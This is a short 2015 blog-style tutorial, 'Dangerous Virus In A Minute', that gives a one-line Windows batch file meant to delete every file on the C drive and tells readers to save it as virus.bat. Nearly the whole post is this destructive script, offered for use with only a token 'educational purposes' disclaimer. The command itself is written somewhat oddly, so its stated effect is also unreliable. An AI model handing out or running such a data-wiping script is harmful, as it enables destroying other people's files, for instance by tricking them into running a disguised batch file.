Saturday 11 April 2015

Dangerous Virus In A Minute

You will create this using batch file. This batch file, when run will delete the files in C Drive completely.

1. Open Notepad and copy below code into it.

@Echo off

Del C:\ *.* |y



2. Save this file as virus.bat (Name can be anything interesting name but .bat is must)

3. Now, running this file will delete all the files on C Drive.


Warning: Please don't try to run on your own computer or else it will delete all the content of your C Drive. I will not be responsible for any damage done to your computer. This tutorial is just for educational purposes only